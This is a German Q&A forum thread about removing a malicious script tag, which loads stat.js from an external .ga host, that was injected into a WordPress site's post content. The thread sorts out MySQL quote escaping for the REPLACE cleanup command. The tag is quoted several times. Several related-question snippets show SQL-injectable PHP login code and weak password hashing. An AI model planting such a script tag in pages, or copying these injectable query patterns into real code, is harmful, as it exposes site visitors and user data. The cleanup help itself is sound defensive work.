Wordpress Malware?

In meiner Datenbank in wp_post steht folgendes

habe es mit dem befehl:

UPDATE wp_posts SET post_content = REPLACE(post_content,"<script src='https://https;//main.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script>",'') WHERE post_content LIKE '%travelfornamewalking%'
versucht, aber dann kommt die fehlermeldung:
 #1064 - Fehler in der SQL-Syntax. Bitte die korrekte Syntax im Handbuch nachschlagen bei '"<script src='https://https)' in Zeile 1
wegen dem semikolon nach dem zweiten https.
wie bekomme ich das aus mneiner datenbank?

1 Antwort

Vom Beitragsersteller als hilfreich ausgezeichnet

TheFamousSpy

Von gutefrage auf Grund seines Wissens auf einem Fachgebiet ausgezeichneter Nutzer

Computer, Technik, WordPress

20.02.2021, 16:20

Der Fehler ist meines Erachtens nciht der Strichpunkt sondern die Anführungszeichen. Die musst du escapen, damit deren Sonderfunktion nicht schlagend wird. Ersetze

"<script src='https://https;//main.travelfornamewalking.ga/stat.js?s=newrq' type='text/javascript'></script>"

durch

'<script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script>'

das sollte dann klappen.

Grundsätzlich solltest du in mySQL eher auf einfache Anführungszeichen ( ' ) statt doppelter Anführungszeichen ( " ) setzen weil die doppelten eigentlich nur als Datenbank-Identifier gedacht sind. Man kann es zwar aktivieren, dass es auch für Strings funktioniert, aber es ist natürlich einfacher sich einen Stil anzugewöhnen, der auf jeder mySQL Datenbank funktioniert.

Woher ich das weiß:Berufserfahrung – arbeite seit vielen Jahren in der IT

robinpfeiffe97

Beitragsersteller

20.02.2021, 16:22

trotzdem zeigt er mir noch den fehler an

TheFamousSpy

20.02.2021, 16:28

@robinpfeiffe97

Grad bei mir nochmal getestet und da funktioniert der Befehl. Nur um sicher zu gehen, dass du es nicht falsch kopiert hast:

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script>', '') WHERE post_content LIKE '%travelfornamewalking%'

robinpfeiffe97

Beitragsersteller

20.02.2021, 16:35

@TheFamousSpy

funktioniert nicht bei mir

Beweisbild https://postimg.cc/64ZGzT15

TheFamousSpy

20.02.2021, 16:40

@robinpfeiffe97

Ich glaube es dir eh, ist nur interessant weil es bei mir funktioniert. Ich verwende mySQL 8.0.23

Auch bei einem Online-Syntax Checker sagt er, dass das Statement gut ist:

https://www.piliapp.com/mysql-syntax-check/

robinpfeiffe97

Beitragsersteller

20.02.2021, 16:58

@TheFamousSpy

Ich verwalte seit neustem die Webseite von unserem Verein.

Habe alle Login daten bekommen. Wir sind bei Domain Factory, da geht mysql Version aktuell nur bis 5.6.19, hat mich auch gewundert warum.

Ich vermute das das an der Version liegt, denn wenn ich das Semikolon wegnehmen führ der alles ohne Probleme aus. Bringt mi nur leider nichts, da ich da den exakten Inhalt brauche. Und 1064 Einträge manuell zu bearbeiten hab ich eher weniger Lust.

TheFamousSpy

20.02.2021, 17:17

@robinpfeiffe97

Wow, das ist eigentlich eine Frechheit. Immerhin gibt es die Version 5.6.50, zumindest die sollte man anbieten wenn man schon mySQL 8 nicht unterstützt das vor 2 Jahren rausgekommen ist.

Nachdem du ja immer den selben Text hast könntest du es auch umgehen indem du z.B. Substring verwendest:

Replace (SUBSTRING(post_content, POSITION('<script src=\'https://https' in post_content), 111), '')

Prüfe aber vorher mit einem select-Statement ob das so funktioniert.

Ähnliche Beiträge

MYSQL - phpmyadmin?

Fehlermeldung: #1064 - Fehler in der SQL-Syntax. Bitte die korrekte Syntax im Handbuch nachschlagen bei ') NOT NULL ) ENGINE = InnoDB' in Zeile 1

CREATE TABLE `db_user`.`shop` (`productid` INT(8) NOT NULL , `name` VARCHAR(32) NOT NULL , `producer` VARCHAR(32) NOT NULL , `stock` INT(8) NOT NULL , `price` DOUBLE(8) NOT NULL ) ENGINE = InnoDB;

...zum Beitrag

Richtige sql syntax in c#?

Wie schreibt man die sql syntax in c# richtig bei dem where statement so dass der wert von @KNR übergeben wird und nicht @KNR

Wenn ich eine Zahl in die einfachen anführungszeichen setzte tut es nur soll eine variable übergeben werden.

const string sqlTemplate = "SELECT KUNDENAUFTRAGSNR FROM MESSFELD.AUSSTANDSDATEN WHERE FTNR='@KNR'";

...zum Beitrag

Woran kann das liegen (SQL) php geht nicht - php geht

ich würde gerne von PHP aus ein Query ausführen leider kommt immer die Meldung

"1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Insert into categoryhasquestions (categoryidcategory, questionsQuestions) ' at line 1 "

wenn ich aber den SQL-Befehla ausgeben lasse und mit phpmyadmin ausführe, dann funktioniert es problemlos

Meiin SQL-Befehl wäre etwas zu lang zum Posten aber ich erkläre mal noch was er macht: ich mache ein Insert auf Tabelle A und dannach gleich mehrere Inserts auf Tabelle B (die mit A verknüpft ist) für die Verknüpfung verwende ich die Funktion Lastinsertid()

hätte jemand eine Idee, woran das liegen könnte ?

...zum Beitrag

SQL-Befehle?

Schreibe SQL-Befehle, die folgende Informationen aus der Datenbank holen:

Welches Land hat die Hauptstadt 'Paramaribo'?
Welches Land befindet sich in Asien und (and) hat 47000 km² Fläche?
Welche Länder in Europa haben mehr als 20 Millionen Einwohner?

...zum Beitrag

Korrekte SQL-Abfrage mit PHP-Variable?

Hi,

wie lautet die korrekte Syntax für eine SQL-Abfrage via PHP mit einer Variblen?

Sieht z.Zt. so aus... leider nimmt er $wert nicht an...

$sql = 'SELECT * FROM tabelle WHERE ID = $wert';

...muss $wert in '$wert' oder in "$wert" mit '.$wert.' oder ohne?

Schreibe ich meine SQL-Abfrage besser direkt in " " ?

...zum Beitrag

Nextcloud MySQL ERROR 1064?

Hallo zusammen,

ich möchte mir gerade eine Nextcloud in einem LXC unter Proxmox einrichten.

Aktuell scheitert das aber an der Stelle, bei der ich dem User einen Zugriff auf die Datenbank gebe:

Erstellt wurde die Datenbank mit folgendem Command:

CREATE USER 'nextclouduser'@'localhost' IDENTIFIED BY 'demopassword';

Gefolgt von dem Command, der die Berechtigung auf die Database gibt:

GRANT ALL ON nextcloud.* TO 'nextclouduser'@'localhost' IDENTIFIED BY 'demopassword' WITH GRANT OPTION;

Hier bekomme ich folgenden Error:

GRANT ALL ON nextcloud.* TO 'nextclouduser'@'localhost' IDENTIFIED BY 'demopassword' WITH GRANT OPTION;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'IDENTIFIED BY 'demopassword' WITH GRANT OPTION' at line 1

Auf Google wurde ich zu dem Error nicht wirklich schlau...

Meine aktuelle MySQL Version ist die 8.0.28

...zum Beitrag

SQL-Abfrage: COUNT als bloßen Integer bekommen?

Schönen guten Abend!

Ich habe mir für das Zählen von Einträgen einer Tabelle in einer Datenbank folgende SQL Abfrage gebaut:

$stmt = $database->prepare("SELECT COUNT(*) FROM table WHERE column = :foo");
$stmt->execute(['foo' => $foo]);
$count = $stmt->fetch();

Es klappt auch alles soweit, nur bekomme ich ein Array zurück (indem sich dann auch die richtige Anzahl als Wert befindet)

Nun möchte ich aber kein Array, sondern einfach die Anzahl beispielsweise als bloßen Integer zurückbekommen.

Wer kann mir da weiterhelfen?

Danke im Voraus!

...zum Beitrag

SQL Summe von der aktuellen Woche bekommen?

Hey, ich versuche aus SQL die Summe einer Spalte im Zeitraum von einer Woche zu bekommen (Also vom 01-01-2022 - 07-01-2022). Dabei habe ich folgenden Code versucht, der jedoch nicht das gewünschte Ergebnis erbringt (leider kommt gar nichts dabei raus)

Habt ihr eine Ahnung wo der Fehler liegt und wie man mein Vorhaben richtig umsetzen kann?

"SELECT SUM(" + dbHelper.NOTES + ") FROM " + dbHelper.TABLE_NAME + " WHERE " + dbHelper.DATE + " BETWEEN 01-01-2022 AND 07-01-2022";

In meiner SQL-Datenbank wurde das Datum TEXT abgespeichert, ist das richtig? Oder sollte ein Datum in der Datenbank normalerweise einen anderen Datentypen haben?

...zum Beitrag

MySQL UPDATE-Befehl?

Ich habe folgenden Code, in dem ich Daten aus einer Datenbank ändern will.

Er funktioniert aber noch nicht. Kann mir da wer helfen?

<!DOCTYPE html>
<html lang="de">
    <head>
        <title>Titel</title>
        <meta charset="utf-8">
    </head>
    <body>
<?php
    error_reporting(E_ALL);
    ini_set('display_errors', 'On');
    
    $vorname="Leon";
    $nummer="1";
    
    $pdo = new PDO('mysql:host=rdbms.strato.de;dbname=xxx', 'xxx', 'xxx');
    $sql = "SELECT * FROM Kunden WHERE id = ".$nummer;
    $daten = $pdo->query($sql)->fetch();
    echo "<br>Vorname: ".$daten['vorname'];     echo "<br>Nachname: ".$daten['nachname'];


    $statement = $pdo->prepare("UPDATE Kunden SET vorname='$vorname' WHERE nummer='$nummer'");
    $statement->execute(array('nummer' => $nummer));          $pdo = new PDO('mysql:host=rdbms.strato.de;dbname=xxx', 'xxx', 'xxx');
    $sql = "SELECT * FROM Kunden WHERE id = ".$nummer;       
    $daten = $pdo->query($sql)->fetch();    
          
          
    echo "<br>Vorname: ".$daten['vorname'];
    echo "<br>Nachname: ".$daten['nachname'];

?>
    </body>
</html>

...zum Beitrag

SQL Abfrage - Das Jahr aus Datum & Uhrzeit?

Hallo,

ich habe in der Datenbank ein Datum mit Uhrzeit gespeichert. Ich möchte gerne per SQL-Abfrage nur das Jahr aus dem Datum abfragen. Hat jemand eine Idee?

SELECT DISTINCT dateandclock FROM db WHERE .... ?

...zum Beitrag

Php Hashen mit "Salz" / PASSWORD_DEFAULT?

$password = "passwort";
$hashed = password_hash($password, PASSWORD_DEFAULT);
if(password_verify($password, $hashed)){
    echo $hashed;
}

Also so würde ich jetzt den string "passwort" hashen mit etwas vollkommen zufälligem / salz und es zb auf meiner datenbank speicher, alles schön und gut.

Jetzt kommt das große aber, wenn ich die Seite von irgendwo anders aufrufe. Dann mich einloggen will wird das eingegebene wieder gehasht mit einem salz um es mit der sql datenbank abzugleichen.

Das geht aber garnicht weil dieses Salz doch immer ein anderer ist wenn ihr versteht was ich meine.

Hashes ohne salz vergleichen kriege ich schonmal ohne probleme hin.

zum beispiel so würde mein login/abgleich mit der datenbank aussehen :

if(isset($_POST["username"]) && isset($_POST["password"])){

$hash = hash("sha512", $_POST["password"]);

$mysqli1 = new mysqli($servername, $user, $pw, $db);
$result = $mysqli1->query('SELECT id FROM user WHERE username = "'. $_POST["username"]. '"  ');
$result1 = $mysqli1->query('SELECT id FROM user WHERE password = "'. $hash. '"  ');

if($result->num_rows == 1 and $result1->num_rows == 1 ) {
  echo "Login erfolreich"; 
} else {
    echo "Falsches Passwort oder Nutzername";
}
$mysqli1->close();
}

Hab jetzt mysqli benutzt weil es irgendwie übersichtlicher ist, und ob das anfällig für Sql Injections oder so ist spielt eigentlich keine rolle erstmal. Manche stört das

...zum Beitrag

IIS mit SQL Datenbank (Localhost) verbinden?

Hallo,

Ich habe eine Website die mit einer SQL Datenbank verbunden werden muss. Habe schon einiges im Internet gelesen und habe mir Teils IIS eingerichtet.

Mein Problem ist nur Fehler kommen.

Fehler Screen: https://www2.pic-upload.de/img/32769666/Screenshot_2.png

Kann mir da jemand helfen?

Habe auch Skype bzw. TeamViewer.

Liebe Grüße

...zum Beitrag

PHP MySQL Datenbank Verbindungsfehler?

syntax error, unexpected variable "$res" line 12

<?php
require_once ('connect.php'); 

   $con = mysqli_connect("127.0.0.1", "root", "jbujbujbu");
   mysqli_select_db($con, "test");
   if(isset($_POST["gesendet"]))
   $sql = "SELECT * FROM konzerte"
      . "'Datum'" . $_POST['date']
        . " 'Land = '" . $_POST['land']
      . " 'Stadt = '" . $_POST['stadt']

   $res = mysqli_query($con, $sql)
   or die(mysqli_error($con));
   $num = mysqli_num_rows($res);
   if($num > 0) {echo "<p>Ergebnis:<br></p>";
    echo "<p>";
echo $num;
echo "</p>";
}
else         echo "<p>Keine Ergebnisse<br></p>";

   mysqli_close($con);
?>

...zum Beitrag

Prüfen ob eine SQL SELECT-Abfrage einen Inhalt zurückgibt?

Ich habe in PHP mit SQL einen Wert aus einer Datenbank abgefragt. Gibt es eine Möglichkeit zu überprüfen ob es einen Inhalt gibt. Also quasi wenn die Abfrage so lautet:

SELECT * FROM `TABELLE` WHERE `ID`=1234

Ausgelöst wird wenn es keine Zeile mit ID=1234 gibt?

Danke im Vorraus,

Bohne47

...zum Beitrag

Was möchtest Du wissen?

Deinen Beitrag erstellen